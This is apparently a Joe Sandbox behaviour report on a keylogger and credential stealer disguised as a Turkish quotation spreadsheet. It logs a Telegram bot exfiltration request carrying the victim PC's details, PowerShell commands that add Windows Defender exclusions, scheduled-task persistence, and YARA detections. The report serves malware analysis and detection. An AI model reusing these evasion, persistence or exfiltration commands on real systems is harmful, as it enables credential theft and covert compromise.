2024-09-26 07:00:49 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-26 07:00:49 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.5	49752	149.154.167.220	443	7732	C:\Users\user\AppData\Roaming\OnCgVRIhY.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 07:00:49 UTC	349	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:216865%0D%0ADate%20and%20Time:%2027/09/2024%20/%2004:36:51%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20216865%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2024-09-26 07:00:50 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Thu, 26 Sep 2024 07:00:49 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-26 07:00:50 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

Target ID:	0
Start time:	03:00:00
Start date:	26/09/2024
Path:	C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe"
Imagebase:	0x610000
File size:	681'472 bytes
MD5 hash:	2F7386B9D0023122E2499BC02FCA0E5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2092946249.00000000039C9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.2092946249.00000000039C9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.2092946249.00000000039C9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.2092946249.00000000039C9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	03:00:01
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe"
Imagebase:	0x120000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	03:00:01
Start date:	26/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	03:00:01
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\OnCgVRIhY.exe"
Imagebase:	0x120000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	03:00:01
Start date:	26/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	03:00:01
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\OnCgVRIhY" /XML "C:\Users\user\AppData\Local\Temp\tmp1B98.tmp"
Imagebase:	0x670000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	03:00:01
Start date:	26/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	03:00:02
Start date:	26/09/2024
Path:	C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe"
Imagebase:	0xd40000
File size:	681'472 bytes
MD5 hash:	2F7386B9D0023122E2499BC02FCA0E5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000009.00000002.4512203022.0000000000435000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.4514569706.000000000314B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.4512203022.0000000000439000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000009.00000002.4514569706.0000000003041000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	10
Start time:	03:00:03
Start date:	26/09/2024
Path:	C:\Users\user\AppData\Roaming\OnCgVRIhY.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\OnCgVRIhY.exe
Imagebase:	0x960000
File size:	681'472 bytes
MD5 hash:	2F7386B9D0023122E2499BC02FCA0E5A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 32%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	03:00:04
Start date:	26/09/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff6ef0c0000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	03:00:06
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\OnCgVRIhY" /XML "C:\Users\user\AppData\Local\Temp\tmp2CAF.tmp"
Imagebase:	0x670000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	03:00:06
Start date:	26/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	03:00:06
Start date:	26/09/2024
Path:	C:\Users\user\AppData\Roaming\OnCgVRIhY.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\OnCgVRIhY.exe"
Imagebase:	0xb90000
File size:	681'472 bytes
MD5 hash:	2F7386B9D0023122E2499BC02FCA0E5A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 0000000E.00000002.4512207120.0000000000432000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000E.00000002.4512207120.0000000000434000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000E.00000002.4515102020.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.4515102020.000000000306E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	9.6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	84
Total number of Limit Nodes:	8

Executed Functions

Function 06C126CC Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2101926848.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c10000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f945b43920ee9bbad0489c27677b382b6cf3ee569fe8e120988849e741fcfe7a
Instruction ID: 4b213929c5318dac4e86bad441a516a9c7283dc9477b06cc20b8f8accdf0f0ec
Opcode Fuzzy Hash: f945b43920ee9bbad0489c27677b382b6cf3ee569fe8e120988849e741fcfe7a
Instruction Fuzzy Hash: 1AA0017885E2008BA3985E22D1194F4A93C961F112B107640651A6A0464A99CA84E5A8

Function 0287D331 Relevance: 6.1, APIs: 4, Instructions: 132
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 0287D3BE
GetCurrentThread.KERNEL32 ref: 0287D3FB
GetCurrentProcess.KERNEL32 ref: 0287D438
GetCurrentThreadId.KERNEL32 ref: 0287D491

Memory Dump Source

Source File: 00000000.00000002.2091349566.0000000002870000.00000040.00000800.00020000.00000000.sdmp, Offset: 02870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2870000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: f13f5546642a2ca08425cacf44bd7e709b4efe26e11d2b10bc48a33f8f2f7060
Instruction ID: d1c14b75bac5103219cd6afbe3e258dd3e68ec79f0c0898e1a61cba64574b995
Opcode Fuzzy Hash: f13f5546642a2ca08425cacf44bd7e709b4efe26e11d2b10bc48a33f8f2f7060
Instruction Fuzzy Hash: C55176B49002498FDB14DFAADA48B9EBBF1FF48314F24C069E418A72A1D734A945CB65

Function 0287D340 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 0287D3BE
GetCurrentThread.KERNEL32 ref: 0287D3FB
GetCurrentProcess.KERNEL32 ref: 0287D438
GetCurrentThreadId.KERNEL32 ref: 0287D491

Memory Dump Source

Source File: 00000000.00000002.2091349566.0000000002870000.00000040.00000800.00020000.00000000.sdmp, Offset: 02870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2870000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 4e95d326a498799a7c33a4708a5f131d129c4d23c587f36a4dc247f16af1ffe4
Instruction ID: 39f250c1c9eaa6ed4622270b7f12921cee1bb2108693ae7add4a0361383c55fe
Opcode Fuzzy Hash: 4e95d326a498799a7c33a4708a5f131d129c4d23c587f36a4dc247f16af1ffe4
Instruction Fuzzy Hash: AA5168B4900209CFDB14DFAADA48B9EBBF1FF48314F24C469E019A7350D774A945CB65

Function 0287B0A8 Relevance: 1.7, APIs: 1, Instructions: 198
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0287B2FE

Memory Dump Source

Source File: 00000000.00000002.2091349566.0000000002870000.00000040.00000800.00020000.00000000.sdmp, Offset: 02870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2870000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: acc8cec1ca24e51507d8907a6531fa8343ab811f0a448b38aa301d3979c453bf
Instruction ID: f6c03d787bcdaf82e502a6515ec43da6daf52ba78c9881c0bcf6f7b5b3e39942
Opcode Fuzzy Hash: acc8cec1ca24e51507d8907a6531fa8343ab811f0a448b38aa301d3979c453bf
Instruction Fuzzy Hash: A5713778A00B058FD724DF2AC44575ABBF2FF88708F00892DD48AD7A50DB75E946CBA1

Function 028744B4 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 028759C9

Memory Dump Source

Source File: 00000000.00000002.2091349566.0000000002870000.00000040.00000800.00020000.00000000.sdmp, Offset: 02870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2870000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: d1bf225c03efe16f6004b30eafb5d7e22d324815ee64ef22a9efab1a26bf3032
Instruction ID: f42be0609a1b162e2012838162f6dc5fb626f9014a515d072d1a6ada26607ffc
Opcode Fuzzy Hash: d1bf225c03efe16f6004b30eafb5d7e22d324815ee64ef22a9efab1a26bf3032
Instruction Fuzzy Hash: 0941D2B5C0071DCBDB24CFA9C944B9EBBF5BF48304F60816AD408AB251DB75694ACF90

Function 0287590C Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 028759C9

Memory Dump Source

Source File: 00000000.00000002.2091349566.0000000002870000.00000040.00000800.00020000.00000000.sdmp, Offset: 02870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2870000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: e88942bdeb76744d3054c969079001e465ffa920102f956da911ea4987f8c5f8
Instruction ID: d0f99950594739a4281960ce50229e033d158dcc5d25e6bed47d4fb4cc0cd296
Opcode Fuzzy Hash: e88942bdeb76744d3054c969079001e465ffa920102f956da911ea4987f8c5f8
Instruction Fuzzy Hash: C241DFB5C00719CEDF24CFA9C984B9EBBB1BF49304F60816AD408AB255DB75694ACF90

Function 02875910 Relevance: 1.6, APIs: 1, Instructions: 94
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 028759C9

Memory Dump Source

Source File: 00000000.00000002.2091349566.0000000002870000.00000040.00000800.00020000.00000000.sdmp, Offset: 02870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2870000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 37fc9eba896bad66269a733b856d93e7b5268d5a9596edef671c9abd0a93f3fd
Instruction ID: 84408fbfd8b2638cc54a0dec9d31a0e276efb32cc0711b9c6ab1875c77623d37
Opcode Fuzzy Hash: 37fc9eba896bad66269a733b856d93e7b5268d5a9596edef671c9abd0a93f3fd
Instruction Fuzzy Hash: BE41DEB5C00719CFDF24CFA9C984B9EBBB1BF49304F20816AD409AB255DB75694ACF90

Function 02875A84 Relevance: 1.6, APIs: 1, Instructions: 88
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2091349566.0000000002870000.00000040.00000800.00020000.00000000.sdmp, Offset: 02870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2870000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 883778b83945c4943a0acd337e30ff375bfa962ad82e805ff32b46fb0821dcf8
Instruction ID: d020c989a2f2a85191acd91951915d93177e3d0bba4423d5d1861eba6cb9668b
Opcode Fuzzy Hash: 883778b83945c4943a0acd337e30ff375bfa962ad82e805ff32b46fb0821dcf8
Instruction Fuzzy Hash: 9631E0B9804348CFEB11CFA8C8847ADBFF0EF06314F944199C445AB261C779A94ACB51

Function 06C13771 Relevance: 1.6, APIs: 1, Instructions: 80
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 06C1373D

Memory Dump Source

Source File: 00000000.00000002.2101926848.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c10000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 83041be3dbe0b85dc1c89ca4fa2fa8db880ae52dd522427e42f1438183fddf09
Instruction ID: edacdd1b93abe4eb24c77c493548792b154ba5a737ca536e74a92d2c9b553fa2
Opcode Fuzzy Hash: 83041be3dbe0b85dc1c89ca4fa2fa8db880ae52dd522427e42f1438183fddf09
Instruction Fuzzy Hash: 9131C9B5D04259CFDB10CF99D944BEEBBF0AB4A314F10805AD818BB240C734AA44DFE1

Function 0287D581 Relevance: 1.6, APIs: 1, Instructions: 64
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0287D60F

Memory Dump Source

Source File: 00000000.00000002.2091349566.0000000002870000.00000040.00000800.00020000.00000000.sdmp, Offset: 02870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2870000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: fc530121715f256b2adff4a2ed838dc0be099cd628370aae57e47a668e34783f
Instruction ID: 948e736716f3190390782bf817edd2ec882444bef67f6832c770b58e31b6a73c
Opcode Fuzzy Hash: fc530121715f256b2adff4a2ed838dc0be099cd628370aae57e47a668e34783f
Instruction Fuzzy Hash: EE21E3B9D002499FDB10CF9AD984ADEBBF5EB48320F14841AE918A3351D379A954CFA1

Function 0287D588 Relevance: 1.6, APIs: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0287D60F

Memory Dump Source

Source File: 00000000.00000002.2091349566.0000000002870000.00000040.00000800.00020000.00000000.sdmp, Offset: 02870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2870000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 3555fdba0fbdee4f76c740138c41459d01898e09063e5912ca9d0a1d2ff771e5
Instruction ID: c24c7ab2df1d675bfd3f9182d60b5b754d4789917af2391bed3d78492725bd0e
Opcode Fuzzy Hash: 3555fdba0fbdee4f76c740138c41459d01898e09063e5912ca9d0a1d2ff771e5
Instruction Fuzzy Hash: DB21E4B59002489FDB10CF9AD984ADEBBF8EB48310F14841AE918A3350D374A944CFA4

Function 0287B298 Relevance: 1.5, APIs: 1, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0287B2FE

Memory Dump Source

Source File: 00000000.00000002.2091349566.0000000002870000.00000040.00000800.00020000.00000000.sdmp, Offset: 02870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2870000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 6bf87b9204533e41b8ab3a3e61011b72b55536c06d92c0aef7763fabba25c3ff
Instruction ID: e8ba37895f21c38af15392bcf804b19912fbcc852879a37401a94be071c707cd
Opcode Fuzzy Hash: 6bf87b9204533e41b8ab3a3e61011b72b55536c06d92c0aef7763fabba25c3ff
Instruction Fuzzy Hash: 321110BAC002498FDB10CF9AC844ADEFBF9EF88324F14841AD529A7210C375A545CFA1

Function 06C136D8 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 06C1373D

Memory Dump Source

Source File: 00000000.00000002.2101926848.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c10000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 8aa4c06f67078be6b947f60ab74e758a97568245b54def27ddd90c3901659823
Instruction ID: ce18b85acceda736e543456ff922ee256038c1c012801a8ee14e3f6fb8ec1a09
Opcode Fuzzy Hash: 8aa4c06f67078be6b947f60ab74e758a97568245b54def27ddd90c3901659823
Instruction Fuzzy Hash: 8C11F2B5804389DFDB10CF99D988BDEBBF8EB48324F20845AE558A7210C375A944CFA1

Function 06C13050 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 06C1373D

Memory Dump Source

Source File: 00000000.00000002.2101926848.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c10000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 1edd89209bfe28d11b205b6efadf85e26bf49e73ab9a0429e89e346879f075be
Instruction ID: f8e357b17dfcf145e07917268545d9782fedc41aa2da02a3ebda655887de7c87
Opcode Fuzzy Hash: 1edd89209bfe28d11b205b6efadf85e26bf49e73ab9a0429e89e346879f075be
Instruction Fuzzy Hash: 821103B5804389DFDB10DF9AC985BDEBBF8EB48324F20841AE518A7340C375A944CFA5

Function 00F8D3D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2090128119.0000000000F8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F8D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f8d000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 643d96ebb3e94e97d34e3c8eef400aee46368efc733de446313b72e0ee393c6b
Instruction ID: a04771a74e4718de327ae787755f05712e5ef8c34f8b8b1f3bea23b5d33eb8ba
Opcode Fuzzy Hash: 643d96ebb3e94e97d34e3c8eef400aee46368efc733de446313b72e0ee393c6b
Instruction Fuzzy Hash: 74213A72504204DFDB05EF14D9C0B56BF65FF98324F24C56DD9090B296C336E856E7A2

Function 00F9D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2090249197.0000000000F9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F9D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f9d000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 794f0faf2163a2ff45aa103310aca27f0882176fbe4ac34b8416d8e844dc4d7d
Instruction ID: 984851886d05518e754c3121f1f2bff648d5718bea95519ad39ebf1bda49a10d
Opcode Fuzzy Hash: 794f0faf2163a2ff45aa103310aca27f0882176fbe4ac34b8416d8e844dc4d7d
Instruction Fuzzy Hash: A721F575904200DFEF15DF14D984B16BB65FB84324F34C56DD90A4B26AC33BD807DA61

Function 00F9D005 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2090249197.0000000000F9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F9D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f9d000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0dbe5819644be5d8157145a5d5c9f2477a4309aa4df4b26a920ec462602f920c
Instruction ID: b9009252e0fc4b451fbb7543966111d4cf6b19489683c91fc5b8c9bc63160f40
Opcode Fuzzy Hash: 0dbe5819644be5d8157145a5d5c9f2477a4309aa4df4b26a920ec462602f920c
Instruction Fuzzy Hash: 332150755093808FDB12CF24D994715BF71EB46324F28C5EAD8498B6A7C33A980ADB62

Function 00F8D3D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2090128119.0000000000F8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F8D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f8d000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a42a10f79047cfc5a8dfbea04f5877e4b045e58f4eb555799dbe40d0299e0d1
Instruction ID: aeb7e7a67dc0e25841f7e77a2e767b3bd65d2cac6259ef79f5aa1c8a3b81effc
Opcode Fuzzy Hash: 2a42a10f79047cfc5a8dfbea04f5877e4b045e58f4eb555799dbe40d0299e0d1
